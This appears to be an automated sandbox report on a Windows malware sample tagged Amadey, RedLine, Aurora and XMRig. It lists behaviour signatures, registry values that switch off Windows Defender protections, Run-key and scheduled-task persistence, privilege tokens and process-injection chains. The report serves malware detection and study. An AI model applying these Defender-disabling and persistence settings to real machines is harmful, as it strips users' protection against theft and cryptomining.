Malware Analysis Report

2024-11-30 23:13

Sample ID 230224-3v6hfabd48
Target da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
SHA256 da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
Tags
amadey aurora redline xmrig frukt rodik discovery evasion infostealer miner persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e

Threat Level: Known bad

The file da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e was found to be: Known bad.

Malicious Activity Summary

amadey aurora redline xmrig frukt rodik discovery evasion infostealer miner persistence spyware stealer trojan

Amadey

Aurora

RedLine payload

Modifies Windows Defender Real-time Protection settings

RedLine

xmrig

XMRig Miner payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-02-24 23:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-02-24 23:51

Reported

2023-02-24 23:53

Platform

win10-20230220-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe"

Signatures

Amadey

trojan amadey

Aurora

stealer aurora

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A (39 identical rows; no indicator details recorded)

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows; no indicator details recorded)

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3516 set thread context of 3996 N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Windows\system32\rundll32.exe

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 3176 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
PID 3176 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3296 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3296 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3296 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3296 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3296 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
